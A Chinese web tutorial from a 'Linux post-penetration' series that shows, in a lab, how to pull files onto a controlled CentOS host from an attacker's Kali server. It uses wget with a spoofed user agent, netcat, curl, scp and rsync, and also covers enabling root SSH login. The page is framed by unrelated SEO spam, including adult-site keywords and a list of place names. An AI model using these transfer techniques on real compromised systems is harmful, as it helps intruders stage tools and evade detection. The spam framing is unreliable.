中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

linux后滲透系列之怎么下載文件

發布時間:2021-10-28 16:12:13 來源:億速云 閱讀:159 作者:iii 欄目:編程語言

這篇文章主要介紹“linux后滲透系列之怎么下載文件”,在日常操作中,相信很多人在linux后滲透系列之怎么下載文件問題上存在疑惑,小編查閱了各式資料,整理出簡單好用的操作方法,希望對大家解答”linux后滲透系列之怎么下載文件”的疑惑有所幫助!接下來,請跟著小編一起來學習吧!

準備工作

首先需要架設服務器,將要下載的文件部署在服務器上,筆者用的服務器為Kali Linux架設,ip地址是192.168.8.111,被控端是Centos,ip地址是192.168.8.112

linux后滲透系列之怎么下載文件

服務器端架設完成,后文會演示Linux許多的下載方法。

下載文件

Wget

用于從網絡上下載文件的一個工具(Linux自帶,Windows需要去官網下載安裝,與我們下載直接違背,所以Windows篇并沒有提)

使用方法:

第一種——普通下載

wget http://192.168.8.111/test/test.txt

linux后滲透系列之怎么下載文件

第二種——偽造UA下載

首先來看一下正常下載的UA

linux后滲透系列之怎么下載文件

刪掉test.txt文件重新下載,輸入命令:

wget --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" http://192.168.8.111/test/test.txt

linux后滲透系列之怎么下載文件

然后再查看Kali Linux的Wireshark捕獲的數據包

linux后滲透系列之怎么下載文件

可以看到成功修改掉UA,其實wget還有許多功能,不過對于被控機進行下載不需要太多方式,只需要簡單的下載即可,而且wget只有后臺下載時才會產生日志文件,可以說是Linux中的一個下載神器

NC

NetCat,功能很多就不介紹了,簡要寫下如何通過NC進行下載

使用方法:

Kali Linux端輸入命令:nc -lvp 8888 < test.txt

linux后滲透系列之怎么下載文件

Centos端輸入命令:

nc 192.168.8.111 8888 > test.txt

linux后滲透系列之怎么下載文件

會顯示空白,其實已經傳輸完成了,另起終端就可以查看

linux后滲透系列之怎么下載文件

然后只需要終端nc就可以了,在Kali Linux端可以看到傳輸

linux后滲透系列之怎么下載文件

Curl

利用URL語法在命令行下工作的文件傳輸工具

使用方法:

Centos端輸入命令:curl -O http://192.168.8.111/test/test.txt(注意:大寫的o)

linux后滲透系列之怎么下載文件

可以看到下載成功,curl的功能如同wget一樣,也可以進行修改UA,這里就不再演示

SSH

建立在應用層基礎上的安全協議,專為遠程登錄會話和其他網絡服務提供安全性的協議

本次需要用到的是scp命令,scp是基于SSH登錄進行安全的遠程文件拷貝,所以需要確保SSH服務是正常運行的

輸入命令:

service sshd start

linux后滲透系列之怎么下載文件

可以看到是正常運行狀態

使用方法:

第一種——本地復制到遠程

在Kali Linx端輸入命令:

scp /var/www/html/test/test.txt root@192.168.8.112:/root

linux后滲透系列之怎么下載文件

第一次連接會詢問無法檢測遠程主機的真實性,是否需要繼續連接,輸入yes即可,往后再次連接就不會詢問

linux后滲透系列之怎么下載文件

第二種——將遠程文件復制到本地

如果用Kali Linux做服務器的話,首先需要修改下配置文件(默認Kali Linx中SSH登錄是禁用root用戶的),輸入命令:

vim /etc/ssh/sshd_config,添加一條PermitRootLogin yes

linux后滲透系列之怎么下載文件

然后重啟服務即可

linux后滲透系列之怎么下載文件

然后在Centos端輸入命令:

scp root@192.168.8.111:/var/www/html/test/test.txt /root

linux后滲透系列之怎么下載文件

Rsync

Rsync是Linux系統中一個鏡像備份工具,可以遠程同步,文件復制,默認系統自帶且運行

使用方法:

第一種——遠程同步

在Kali Linux端輸入命令:

rsync -r /var/www/html/test (Kali Linux的目錄)192.168.8.112:/var/www/html/(遠程主機被同步的目錄)

linux后滲透系列之怎么下載文件

在Centos端查看同步的目錄

linux后滲透系列之怎么下載文件

可以看到整個目錄都進行了同步

第二種——利用SSH

Kali Linux輸入命令:

rsync -av test.txt -e  ssh root@192.168.8.112:/root

linux后滲透系列之怎么下載文件

-e選項可以指定命令,所以說實際上是用SSH做的傳輸

linux后滲透系列之怎么下載文件

有趣的是Rsync還可以列出遠程主機的目錄,命令為:rsync 192.168.8.112:/var/www/html/,筆者曾在某項目駐場遇到過一臺主機未授權訪問Rsync,甚至可以直接進行同步,拿到一個高危

到此,關于“linux后滲透系列之怎么下載文件”的學習就結束了,希望能夠解決大家的疑惑。理論與實踐的搭配能更好的幫助大家學習,快去試試吧!若想繼續學習更多相關知識,請繼續關注億速云網站,小編會繼續努力為大家帶來更多實用的文章!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

韶关市| 平顶山市| 深水埗区| 济宁市| 灵川县| 平度市| 手机| 永平县| 天门市| 阜阳市| 永和县| 香格里拉县| 二连浩特市| 西安市| 定西市| 德惠市| 鹰潭市| 垫江县| 西和县| 崇信县| 石林| 镇江市| 徐汇区| 若尔盖县| 治多县| 乐至县| 纳雍县| 蓬莱市| 嘉善县| 视频| 武山县| 泸定县| 龙南县| 德清县| 石景山区| 清镇市| 武冈市| 赤城县| 色达县| 湟中县| 友谊县|